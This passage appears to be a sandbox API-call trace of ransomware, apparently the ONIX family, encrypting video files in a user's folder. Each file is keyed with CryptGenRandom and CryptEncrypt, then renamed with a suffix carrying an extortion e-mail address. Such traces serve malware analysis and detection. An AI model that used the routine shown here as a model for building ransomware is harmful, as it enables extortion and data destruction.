SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.671] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.671] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.671] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.672] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv", dwFileAttributes=0x80) returned 1 [0121.672] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv") returned 51 [0121.672] GetProcessHeap () returned 0x410000 [0121.672] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd6) returned 0x44faf8 [0121.672] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv" [0121.672] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.672] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=77483) returned 1 [0121.672] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x12eab [0121.672] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.672] GetProcessHeap () returned 0x410000 [0121.672] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.672] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.674] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.675] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.676] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.677] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12eab) returned 0xf50048 [0121.678] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x12eab) returned 0xf62f00 [0121.678] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.678] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x12eab, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x12eab, lpOverlapped=0x0) returned 1 [0121.682] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12eab, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.682] CloseHandle (hObject=0x4c8) returned 1 [0121.682] GetProcessHeap () returned 0x410000 [0121.682] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.683] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\exfngrmlv.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ExfnGRMLv.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\exfngrmlv.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.684] GetProcessHeap () returned 0x410000 [0121.685] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.685] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe7227f0, ftCreationTime.dwHighDateTime=0x1d5dca3, ftLastAccessTime.dwLowDateTime=0x5a0c9c50, ftLastAccessTime.dwHighDateTime=0x1d5e18a, ftLastWriteTime.dwLowDateTime=0x5a0c9c50, ftLastWriteTime.dwHighDateTime=0x1d5e18a, nFileSizeHigh=0x0, nFileSizeLow=0x1bf0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fp5Gmho1qhw.mp4", cAlternateFileName="FP5GMH~1.MP4")) returned 1 [0121.685] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fp5gmho1qhw.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.685] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.685] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1bf0, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.685] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.685] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.686] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.686] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.686] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.686] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.686] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4", dwFileAttributes=0x80) returned 1 [0121.686] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4") returned 53 [0121.686] GetProcessHeap () returned 0x410000 [0121.686] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xda) returned 0x44faf8 [0121.686] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4" [0121.686] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.686] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=7152) returned 1 [0121.686] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1bf0 [0121.687] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.687] GetProcessHeap () returned 0x410000 [0121.687] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.687] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.688] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.690] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.691] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.692] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1bf0) returned 0x4dcb68 [0121.692] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1bf0) returned 0x4de760 [0121.692] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.692] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x1bf0, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x1bf0, lpOverlapped=0x0) returned 1 [0121.693] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1bf0, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.693] CloseHandle (hObject=0x4c8) returned 1 [0121.694] GetProcessHeap () returned 0x410000 [0121.694] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.694] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fp5gmho1qhw.mp4"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fp5Gmho1qhw.mp4.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fp5gmho1qhw.mp4.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.696] GetProcessHeap () returned 0x410000 [0121.696] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.696] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55b0c30, ftCreationTime.dwHighDateTime=0x1d5e1b9, ftLastAccessTime.dwLowDateTime=0x36bb60b0, ftLastAccessTime.dwHighDateTime=0x1d5e248, ftLastWriteTime.dwLowDateTime=0x36bb60b0, ftLastWriteTime.dwHighDateTime=0x1d5e248, nFileSizeHigh=0x0, nFileSizeLow=0x979a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h8XZW5Kb-.mkv", cAlternateFileName="H8XZW5~1.MKV")) returned 1 [0121.696] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h8xzw5kb-.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.696] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.696] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x979a, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.696] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.696] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.697] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.697] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.697] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.697] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.697] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv", dwFileAttributes=0x80) returned 1 [0121.697] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv") returned 51 [0121.697] GetProcessHeap () returned 0x410000 [0121.697] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd6) returned 0x44faf8 [0121.697] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv" [0121.697] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.698] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=38810) returned 1 [0121.698] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x979a [0121.698] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.698] GetProcessHeap () returned 0x410000 [0121.698] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.698] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.698] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.699] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.702] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.703] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x979a) returned 0x4dcb68 [0121.703] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x979a) returned 0xf50048 [0121.704] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.704] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x979a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x979a, lpOverlapped=0x0) returned 1 [0121.706] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x979a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.706] CloseHandle (hObject=0x4c8) returned 1 [0121.707] GetProcessHeap () returned 0x410000 [0121.707] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.707] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h8xzw5kb-.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h8XZW5Kb-.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h8xzw5kb-.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.709] GetProcessHeap () returned 0x410000 [0121.709] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.709] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3123610, ftCreationTime.dwHighDateTime=0x1d5e309, ftLastAccessTime.dwLowDateTime=0xe6f04070, ftLastAccessTime.dwHighDateTime=0x1d5e402, ftLastWriteTime.dwLowDateTime=0xe6f04070, ftLastWriteTime.dwHighDateTime=0x1d5e402, nFileSizeHigh=0x0, nFileSizeLow=0x15be3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ha2hLEUw0_Qj.mkv", cAlternateFileName="HA2HLE~1.MKV")) returned 1 [0121.709] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ha2hleuw0_qj.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.709] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.710] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15be3, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.710] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.710] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.710] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.710] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.711] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.711] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.711] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv", dwFileAttributes=0x80) returned 1 [0121.711] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv") returned 54 [0121.711] GetProcessHeap () returned 0x410000 [0121.711] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdc) returned 0x44faf8 [0121.711] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv" [0121.711] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.711] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=89059) returned 1 [0121.711] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x15be3 [0121.711] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.711] GetProcessHeap () returned 0x410000 [0121.711] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.711] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.713] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.714] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.715] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.716] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15be3) returned 0xf50048 [0121.717] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15be3) returned 0xf65c38 [0121.717] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.717] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x15be3, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x15be3, lpOverlapped=0x0) returned 1 [0121.721] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15be3, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.721] CloseHandle (hObject=0x4c8) returned 1 [0121.722] GetProcessHeap () returned 0x410000 [0121.722] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.722] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ha2hleuw0_qj.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ha2hLEUw0_Qj.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ha2hleuw0_qj.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.724] GetProcessHeap () returned 0x410000 [0121.724] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.724] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b7a9a30, ftCreationTime.dwHighDateTime=0x1d5e309, ftLastAccessTime.dwLowDateTime=0xebb592e0, ftLastAccessTime.dwHighDateTime=0x1d5df2f, ftLastWriteTime.dwLowDateTime=0xebb592e0, ftLastWriteTime.dwHighDateTime=0x1d5df2f, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j8w31.mkv", cAlternateFileName="")) returned 1 [0121.724] CreateFileW 